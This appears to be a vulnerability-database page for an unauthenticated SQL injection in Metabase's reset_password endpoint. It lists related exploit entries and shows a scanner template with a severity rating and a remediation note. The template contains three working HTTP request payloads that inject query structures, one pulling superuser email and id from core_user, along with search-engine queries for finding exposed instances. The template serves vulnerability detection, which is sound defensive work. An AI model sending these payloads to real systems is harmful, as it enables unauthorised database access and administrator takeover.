Metabase - Unauthenticated SQL Injection
| Reporter | Title | Published | Views | Family All 41 |
|---|---|---|---|---|
| Exploit for SQL Injection in Metabase | 27 Aug 202606:51 | – | githubexploit | |
| Exploit for SQL Injection in Metabase | 26 Aug 202617:45 | – | githubexploit | |
| metabase-sql-poc | 28 Aug 202612:16 | – | githubexploit | |
| Exploit for CVE-2026-72898 | 12 Aug 202613:54 | – | githubexploit | |
| Exploit for SQL Injection in Metabase | 14 Sep 202609:54 | – | githubexploit | |
| Exploit for SQL Injection in Metabase | 13 Aug 202621:08 | – | githubexploit | |
| Exploit for SQL Injection in Metabase | 15 Aug 202609:06 | – | githubexploit | |
| CVE-2026-72898 | 10 Aug 202617:55 | – | attackerkb | |
| The vulnerability of the Metabase data visualization and reporting software lies in the lack of security measures for query structures, allowing attackers to enhance their privileges and execute arbitrary code. | 21 Aug 202600:00 | – | bdu_fstec | |
| CVE-2026-72898 vulnerabilities | 13 Aug 202620:26 | – | cgr |
10
id: CVE-2026-72898
info:
name: Metabase - Unauthenticated SQL Injection
author: 0x_Akoko,pdteam
severity: critical
description: |
Metabase contains a sql injection caused by improper sanitization of input in the '/reset_password' database endpoint, letting remote unauthenticated attackers gain administrator access, exploit requires no special privileges.
impact: |
Remote unauthenticated attackers can execute arbitrary SQL and gain administrator access to the Metabase instance.
remediation: |
Update to the latest version of Metabase.
reference:
- https://github.com/metabase/metabase/security/advisories/GHSA-vwf4-m7j8-wcjf
- https://securityonline.info/metabase-sql-injection-zero-day-exploited/
- https://nvd.nist.gov/vuln/detail/CVE-2026-72898
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2026-72898
epss-score: 0.94217
epss-percentile: 0.99843
cwe-id: CWE-89
metadata:
verified: true
max-request: 3
shodan-query: http.title:"Metabase"
fofa-query: title="Metabase"
product: metabase
vendor: metabase
tags: cve,cve2026,sqli,metabase,unauth,rce,kev,vkev
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST /api/session/reset_password HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"token":{"select":1},"password":"TestPassword1!"}
matchers:
- type: dsl
dsl:
- 'status_code == 400'
- 'contains_all(body, "should be a string", "{:select 1}")'
condition: and
internal: true
- raw:
- |
POST /api/session/reset_password HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"token":{"select":["email","id"],"from":["core_user"],"where":["=","is_superuser",true],"limit":1},"password":"TestPassword1!"}
matchers:
- type: dsl
dsl:
- 'status_code == 400'
- 'contains_all(body, "is_superuser", "core_user")'
condition: and
internal: true
- raw:
- |
POST /api/session/reset_password HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"token":"1_0000","password":"TestPassword1!","user-id":{"select":["id"],"from":["core_user"],"where":["=","is_superuser",true],"limit":1}}
matchers:
- type: dsl
dsl:
- 'status_code == 400'
- 'contains_all(body, "\"errors\"", "\"password\"")'
- '!contains(body, "disallowed key")'
condition: and
# digest: 4a0a0047304502201f9f4511d30163494a90f67bd70193e99eecda2b97ba6f061773e20f7db12a95022100fd572e7f6ddddc9f65290ba0c5796487181a18e880f96820dee521977b09a8ea:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Aug 2026 03:46Current
8.2High risk
Vulners AI Score8.2
CVSS 410
CVSS 3.110
EPSS0.94217
SSVC